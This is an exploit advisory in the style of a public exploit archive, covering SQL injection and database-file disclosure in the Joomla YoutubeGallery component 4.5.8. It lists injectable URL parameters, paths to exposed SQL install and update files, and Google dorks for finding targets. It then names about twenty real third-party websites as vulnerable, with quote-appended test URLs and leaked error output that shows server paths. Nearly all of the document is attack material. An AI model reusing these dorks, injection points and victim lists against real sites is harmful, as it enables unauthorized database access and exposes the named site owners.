######################################################################################## # Exploit Title : Joomla YoutubeGallery Components 4.5.8 Database Disclosure and SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 18/01/2019 # Vendor Homepage : joomlaboat.com # Software Information Links : extensions.joomla.org/extension/youtube-gallery/ joomlaboat.com/en/youtube-gallery # Software Download Link : joomlaboat.com/images/extensions/youtubegallery_free_4.5.8.zip # Software Vulnerable Source Codes : github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql/updates/mysql github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql # Software Affected Versions : 4.5.8 and previous versions # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_youtubegallery'' inurl:''/administrator/components/com_youtubegallery/'' # Previous Version : 4.1.7 CVE Details => nvd.nist.gov/vuln/detail/CVE-2014-4960 - cvedetails.com/cve/CVE-2014-4960/ # CVE : CVE-2014-4960 # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ######################################################################################## # SQL Injection Exploit : ********************** /index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=[SQL Injection] /index.php?option=com_youtubegallery&view=gallery&Itemid=[SQL Injection] /index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[SQL Injection] /index.php?option=com_youtubegallery&view=youtubegallery&Itemid= [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]=[SQL Injection] /index.php?option=com_youtubegallery&view=gallery&Itemid= [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&lang=[SQL Injection] /index.php?option=com_youtubegallery&view=youtubegallery&galleryid= [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=[SQL Injection] /index.php?option=com_youtubegallery&view=youtubegallery&Itemid= [ID-NUMBER]&galleryid=[ID-NUMBER]&videoid=[SQL Injection] /index.php?option=com_easy_youtube_gallery&view=videos&mycategory= [ID-NUMBER]&defaultvideo=[ID-NUMBER]&Itemid=[SQL Injection] /index.php?option=com_youtubegallery&view=youtubegallery&listid= [ID-NUMBER]&themeid=[ID-NUMBER]'&videoid= [YOUTUBE-VIDEO-ID-NUMBER]&tmpl=component&TB_iframe= true&height=[ID-NUMBER]&width=[SQL Injection] ######################################################################################## # Database Disclosure Exploit : *************************** /administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql /administrator/components/com_youtubegallery/sql/uninstall.mysql.utf8.sql /administrator/components/com_youtubegallery/sql/updates/mysql/0.0.1.sql /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.1.sql /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.2.sql /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.3.sql /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.5.sql /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.3.sql /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.5.sql /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.6.sql /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.7.sql /administrator/components/com_youtubegallery/sql/updates/mysql/2.0.0.sql /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.0.sql /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.4.sql /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.0.sql /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.7.sql /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.9.sql /administrator/components/com_youtubegallery/sql/updates/mysql/2.3.0.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.0.0.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.0.6.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.3.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.5.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.8.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.2.4.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.2.7.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.6.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.7.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.9.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.4.8.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.5.7.sql /administrator/components/com_youtubegallery/sql/updates/mysql/3.5.8.sql ######################################################################################## # Example Vulnerable Sites : ************************* [+] terrabit.com.br/cmfp/administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql [+] jfkleinheidorn.de/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql [+] ceensac.com/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&Itemid=266%27 => [ Proof of Concept for SQL Injection ] => archive.is/VXqiB [+] newyddwelshcobs.co.uk/index.php?option=com_youtubegallery&view=gallery&Itemid=48&videoid=1%27 [+] medealabperu.com/senscience/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&videoid=82X2hj53r2I&tmpl=1%27 [+] praiamotor.com.br/index.php?option=com_youtubegallery&view=gallery&Itemid=37%27 [+] ncd.org.jo/index.php?option=com_youtubegallery&view=gallery&Itemid=128%27 [+] nazarethchurchnotethnic.org/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=216&galleryid=1&videoid=1%27 [+] aakashgupta.com/index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=113%27 [+] mindthekids.com.co/index.php?option=com_youtubegallery&view=gallery&Itemid=95&videoid=1%27 [+] ourtransition.info/index.php?option=com_youtubegallery&view=gallery&Itemid=6%27 [+] ventzimartinov.com/index.php?option=com_youtubegallery&view=gallery&Itemid=56&videoid=u-OtHblFgkc&lang=1%27 [+] ponowa48.pl/index.php?option=com_youtubegallery&view=gallery&Itemid=114%27 [+] srisaidarshan.org/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=22%27 [+] carpmachine.at/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&Itemid=140' [+] ondazul.org.br/site/index.php?option=com_youtubegallery&view=gallery&Itemid=73' [+] hitech-stroy.ck.ua/index.php?option=com_youtubegallery&view=gallery&Itemid=4' [+] hundesport-gersdorf.de/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=158&videoid=P833hFQoB4A=1%27 [+] jamesallenclark.com/index.php?option=com_youtubegallery&view=gallery&Itemid=57' ######################################################################################## # Example SQL Database Error : Strict Standards: Only variables should be assigned by reference in /home/medealab/public_html/senscience/plugins/system/rokbox/rokbox.php on line 51 Deprecated: Non-static method VideoSource_YouTube::extractYouTubeID() should not be called statically, assuming $this from incompatible context in /home/medealab /public_html/senscience/components/com_youtubegallery/includes/misc.php on line 198 Warning: DOMDocument::load(http://gdata.youtube.com/feeds/api/videos/RLz2k-oAhPo) [domdocument.load]: failed to open stream: HTTP request failed! HTTP/1.0 410 Gone in /usr/home/gurjiysp/data/www/hitech-stroy.ck.ua/components /com_youtubegallery/models/gallery.php on line 145 ######################################################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ########################################################################################